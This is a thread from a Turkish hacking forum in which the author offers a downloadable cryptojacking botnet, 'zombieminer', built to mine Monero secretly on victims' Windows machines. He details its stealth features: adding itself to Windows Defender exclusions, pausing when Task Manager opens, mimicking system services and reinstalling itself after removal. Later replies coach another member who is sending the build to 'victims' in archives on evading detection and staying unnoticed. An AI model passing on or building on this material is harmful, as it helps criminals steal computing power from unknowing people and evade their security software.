Crypto Coin Mining Botnet: Zombi sistemlerde kendi coininizi kazın

zalim5811

Üye
3 Eki 2012
56
17
Nerdeyse 2 sene önce paylaştığım postu belki hatırlayan olur: Crypto Mining BOTNET: Zombi sistemlerinize kendi bitcoin'inizi kazdırın

Şimdi de eskiden C++ ve Python ile yazdığım sistemin genel olarak aynı işlevde olan ve 0'dan tamamen Rust ile yazdığım çok daha gelişmiş versiyonunu paylaşıyorum.

Çalışma prensibi:
- Kendini hedef sisteme yerleştirerek periyodik olarak kullanıcının bilgisayarı kullanma durumuna göre mining yapar.
- FTP üzerinden güncelleme alabilir.
- Kullanıcıya fark edilmemek için görev yönetcisi açıldığında miningi duraklatır. (bu ayar config dosyasından değiştirilebilir)
- CPU mining yapar ve yalnızca NiceHash pool üzerinden RandomX Monero mine'lar.
- Windows Defender'a yakalanmamak için kendi binary'sini exclusion olarak ekler.
- Sistem idle'da iken bütün cpu gücünü kullanarak, sistem kullanımda iken ise config'de belirtilmiş ayarlara göre mining yapar.

Başlamak için adımlar:
1. NiceHash - Leading Cryptocurrency Platform for Mining and Trading üzerinden nicehash hesabı açın.
2.
Üye olup giriş yaptıkan sonra yukarıdan Mining sekmesine gelip Mining Address butonundan cüzdan adresinizi alın.
3. Aşağıdaki linkten zombieminr'i indirin ve config.json dosyasını düzenlemek için açın.
4. Seçeneklerin hepsinin açıklamaları config dosyasında. nicehash_address'e az önce nicehash'den aldığınız cüzdan adresinizi girin ve diğer ayarları da istenilen gibi düzenleyerek config.json'u kaydedin.
5. ui.exe'yi açıp exe buildlemek için konsola B yazıp enterlayın. miner-ready klasöründe miner-ready.exe dosyası oluşacak.
6. miner-ready.exe'yi mining yapılacak zombi sistemde açın.
Tebrikler. Bu kadardı.

* Daha sonra ben güncelleme yapıp burada paylaştığımda veya config.json'u değiştirip göndermek istediğinizde zombi sistemlere update gönderebilmek ve mininge devam edebilmek için config.json'da FTP bölümlerini doldurmalısınız. Tek kullanımlık, içinde önemli şeyler olmayan bir FTP sunucusu seçin çünkü exe boyutunu küçük tutabilmek için ssl librarylerini eklemedim, ftp bağlantısı tls üzerinden olmayacak. Ben ftp serverını ücretsiz olarak 000webhost.com'dan alıyorum.

* Drive linkinde bir de cleaner.exe bıraktım. Kendi sisteminizde açıp test etmeniz durumunda cleaner'ı açarak sistemi miner'dan temizleyebilirsiniz.

VIRUSTOTAL: VirusTotal

DRIVE DOWNLOAD: ZOMBIEMINER - Google Drive
 

Eagleweb

Uzman üye
8 May 2021
1,434
629
Merhaba,
Nakit kazanmaya ihtiyacı olan arkadaşları idare eder bence uzun bir süre başarılar dilerim güzel konu, var olan kodları sizmi yazdınız yazınızda öyle demişsiniz daha önceki yazınızda ilgili yazı linki : Crypto Mining BOTNET: Zombi sistemlerinize kendi bitcoin'inizi kazdırın


bopcd2a.gif
 
19 May 2020
238
77
Nerdeyse 2 sene önce paylaştığım postu belki hatırlayan olur: Crypto Mining BOTNET: Zombi sistemlerinize kendi bitcoin'inizi kazdırın

Şimdi de eskiden C++ ve Python ile yazdığım sistemin genel olarak aynı işlevde olan ve 0'dan tamamen Rust ile yazdığım çok daha gelişmiş versiyonunu paylaşıyorum.


Çalışma prensibi:
- Kendini hedef sisteme yerleştirerek periyodik olarak kullanıcının bilgisayarı kullanma durumuna göre mining yapar.
- FTP üzerinden güncelleme alabilir.
- Kullanıcıya fark edilmemek için görev yönetcisi açıldığında miningi duraklatır. (bu ayar config dosyasından değiştirilebilir)
- CPU mining yapar ve yalnızca NiceHash pool üzerinden RandomX Monero mine'lar.
- Windows Defender'a yakalanmamak için kendi binary'sini exclusion olarak ekler.
- Sistem idle'da iken bütün cpu gücünü kullanarak, sistem kullanımda iken ise config'de belirtilmiş ayarlara göre mining yapar.


Başlamak için adımlar:
1. NiceHash - Leading Cryptocurrency Platform for Mining and Trading üzerinden nicehash hesabı açın.
2.
Üye olup giriş yaptıkan sonra yukarıdan Mining sekmesine gelip Mining Address butonundan cüzdan adresinizi alın.
3. Aşağıdaki linkten zombieminr'i indirin ve config.json dosyasını düzenlemek için açın.
4. Seçeneklerin hepsinin açıklamaları config dosyasında. nicehash_address'e az önce nicehash'den aldığınız cüzdan adresinizi girin ve diğer ayarları da istenilen gibi düzenleyerek config.json'u kaydedin.
5. ui.exe'yi açıp exe buildlemek için konsola B yazıp enterlayın. miner-ready klasöründe miner-ready.exe dosyası oluşacak.
6. miner-ready.exe'yi mining yapılacak zombi sistemde açın.
Tebrikler. Bu kadardı.

* Daha sonra ben güncelleme yapıp burada paylaştığımda veya config.json'u değiştirip göndermek istediğinizde zombi sistemlere update gönderebilmek ve mininge devam edebilmek için config.json'da FTP bölümlerini doldurmalısınız. Tek kullanımlık, içinde önemli şeyler olmayan bir FTP sunucusu seçin çünkü exe boyutunu küçük tutabilmek için ssl librarylerini eklemedim, ftp bağlantısı tls üzerinden olmayacak. Ben ftp serverını ücretsiz olarak 000webhost.com'dan alıyorum.

* Drive linkinde bir de cleaner.exe bıraktım. Kendi sisteminizde açıp test etmeniz durumunda cleaner'ı açarak sistemi miner'dan temizleyebilirsiniz.

VIRUSTOTAL: VirusTotal

DRIVE DOWNLOAD: ZOMBIEMINER - Google Drive
dostum ben bunu webe uyarlamak ve botnet değil de, kullanıcının mining yaptığının farkında olarak hazırlamak isterim. ancak adreste exe olarak paylaştığın için, yapılandırma ayarları dışında bir dosya yok. çalışmaya dair özelden bilgi vermen mümkün? aldığım bilgiler doğrultusuna javascripte uyarlama niyetindeyim. gerçi o tarihlerde randomx algoritması ile çalışan ve moneroya özel olan bir mining apisi mevcuttu. şuan değil. bu apiyi kullanarak yazdıysan zaten şuan çalışmaz.
 

zalim5811

Üye
3 Eki 2012
56
17
dostum ben bunu webe uyarlamak ve botnet değil de, kullanıcının mining yaptığının farkında olarak hazırlamak isterim. ancak adreste exe olarak paylaştığın için, yapılandırma ayarları dışında bir dosya yok. çalışmaya dair özelden bilgi vermen mümkün? aldığım bilgiler doğrultusuna javascripte uyarlama niyetindeyim. gerçi o tarihlerde randomx algoritması ile çalışan ve moneroya özel olan bir mining apisi mevcuttu. şuan değil. bu apiyi kullanarak yazdıysan zaten şuan çalışmaz.
Mining kısmını ben yazmadım opensource windows targeted bi miner kullanıyorum. Isine yarayacak bir sey bulamazsın paylaşam bile cunku native kodu alıp direkt browserda calıstırma gibi bi olay yok. Ayrıca javascript ile olacak iş de değil mining computational bi işlem olduğu için webassembly yazman gerekir. Internette daha fazla bilgi vardır. Benim program işine yaramaz her şeyi win32 api ile yapıyorum ben.
 

konigsrasse123

Yeni üye
24 Nis 2016
39
3
ui.exe icinde bosluk olan bi directoryde oldugu icin.
Cevabın için teşekkür ederim %10 donate yazdım şimdi rat ağı kurucam hepimiz kazanicaz bakalim hayırlısı olsun bi sorum daha olucak defender açıkken otomatik siler mi bir de rar içinde yollasam kurban açarsa otomatik olarak sisteme bağlanır mı yani ben karşı tarafa rari upload edicem oda açıcak dosyayı ve sistem çalışıcak doğru mudur?
 

zalim5811

Üye
3 Eki 2012
56
17
Cevabın için teşekkür ederim %10 donate yazdım şimdi rat ağı kurucam hepimiz kazanicaz bakalim hayırlısı olsun bi sorum daha olucak defender açıkken otomatik siler mi bir de rar içinde yollasam kurban açarsa otomatik olarak sisteme bağlanır mı yani ben karşı tarafa rari upload edicem oda açıcak dosyayı ve sistem çalışıcak doğru mudur?
Normalde ilk compileladigimda windows defender static binary halindeyken bulamıyordu ama şu an nedenini çözemedim Trojan:Win32/Sabsik.FL.B!ml olarak algılıyor. Sondaki ML yapay zeka ile bulunduğunu gösteriyor yani aslinda false positive sayilir. Henüz miner/zararlı olarak databaselerinde yok. Açıldıktan sonra defendera yakalanması imkansiz ama kendini exclusion olarak eklediği için.
Arşiv içinden veya normal olarak açılması farketmez. UAC yi geçip yönetici izinleri aldıktan sonra her türlü yerleşir sisteme.
 
19 May 2020
238
77
Mining kısmını ben yazmadım opensource windows targeted bi miner kullanıyorum. Isine yarayacak bir sey bulamazsın paylaşam bile cunku native kodu alıp direkt browserda calıstırma gibi bi olay yok. Ayrıca javascript ile olacak iş de değil mining computational bi işlem olduğu için webassembly yazman gerekir. Internette daha fazla bilgi vardır. Benim program işine yaramaz her şeyi win32 api ile yapıyorum ben.
dostum windows üzerinde bende yapabiliyorum. browser üzerinde böyle bir olay varda, neyse.
 

konigsrasse123

Yeni üye
24 Nis 2016
39
3
Normalde ilk compileladigimda windows defender static binary halindeyken bulamıyordu ama şu an nedenini çözemedim Trojan:Win32/Sabsik.FL.B!ml olarak algılıyor. Sondaki ML yapay zeka ile bulunduğunu gösteriyor yani aslinda false positive sayilir. Henüz miner/zararlı olarak databaselerinde yok. Açıldıktan sonra defendera yakalanması imkansiz ama kendini exclusion olarak eklediği için.
Arşiv içinden veya normal olarak açılması farketmez. UAC yi geçip yönetici izinleri aldıktan sonra her türlü yerleşir sisteme.
Peki sadece build olarak çıkardığımız exe dosyasini karşı taraf çalıştırdığı zaman işlem tamam mıdır? ve bu sistem arkaplanda slient bir şekilde mi çalışır şüphe çekmesi işleri sıkıntıya sokabilir tekrardan teşekkür ederim cevabın için.
 

zalim5811

Üye
3 Eki 2012
56
17
Peki sadece build olarak çıkardığımız exe dosyasini karşı taraf çalıştırdığı zaman işlem tamam mıdır? ve bu sistem arkaplanda slient bir şekilde mi çalışır şüphe çekmesi işleri sıkıntıya sokabilir tekrardan teşekkür ederim cevabın için.
Exenin açilmasi yeterli evet. Arkaplanda sistem hizmetlerini taklit ederek çalışıyor. configteki pause on task manager da açıksa görev yöneticisi açıldıgında minerı duraklatarak cpu kullanımını 0a düsürür belli olmamak için. Yine de süphe cekebilir fanların hızlı calismasindan vs. tam garanti veremem. Kaldırılsa bile kendini yeniden yerleştirme gibi bi ozelligi de var.
 

konigsrasse123

Yeni üye
24 Nis 2016
39
3
Tekrardan Merhaba hocam şimdi ben yavaştan kurbanlara yolluyorum yaptığım buildi fakat 2 günde bu kadar kazım yapmış sizce ters giden nedir?
61rhA.jpg
61yl1.jpg
Edit : KENDİ SİSTEMİMİDE EKLEDİM ŞİMDİ O DAHA DETAYLI GÖZÜKÜYOR VE GERÇEKTEN BİŞEYLER KAZMAYA BAŞLIYO DİĞER KURBANLAR İÇİN HİÇ BİR DETAY YOK NEDEN ACABA
61Nic.jpg
 
Son düzenleme:

zalim5811

Üye
3 Eki 2012
56
17
Tekrardan Merhaba hocam şimdi ben yavaştan kurbanlara yolluyorum yaptığım buildi fakat 2 günde bu kadar kazım yapmış sizce ters giden nedir?
61rhA.jpg
61yl1.jpg
Edit : KENDİ SİSTEMİMİDE EKLEDİM ŞİMDİ O DAHA DETAYLI GÖZÜKÜYOR VE GERÇEKTEN BİŞEYLER KAZMAYA BAŞLIYO DİĞER KURBANLAR İÇİN HİÇ BİR DETAY YOK NEDEN ACABA
61Nic.jpg
Detay gozukmuyor cunku nicehash miner kullanmiyorum, kendi makinen de nicehash miner acmissin. Hashrate'in de ondan dusuk olması normal çunku sadece cpu mining yaptırıyorum ben, gpu destegini de ekleyebilirim belki bilmiyorum.
 

konigsrasse123

Yeni üye
24 Nis 2016
39
3
Detay gozukmuyor cunku nicehash miner kullanmiyorum, kendi makinen de nicehash miner acmissin. Hashrate'in de ondan dusuk olması normal çunku sadece cpu mining yaptırıyorum ben, gpu destegini de ekleyebilirim belki bilmiyorum.
CPU mining az kazandırıyo sanki brom nasıl bi çözüm yaparız 2 günde 35 kuruş kazandırmış
 

zalim5811

Üye
3 Eki 2012
56
17
3 makineyle 3 günde 0.17 TL kazandırmış bi problem olmalı yada boşuna uğraşıyoruz bu sistemle
Hashrate'i etkileyecek onlarca faktor var: makinedeki islemci, ne kafar sure acik kaldigi vs. vs.. Minerin farkedilmemesi senin icin onemli degilse pause_on_task_manageri kapat mine_allthetime i aç 7/24 mining yapsin.
az kazanmani ben duzeltemem. tek yapabilecegim gpu mining destegi ile potansiyeli kazancini arttirmak.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.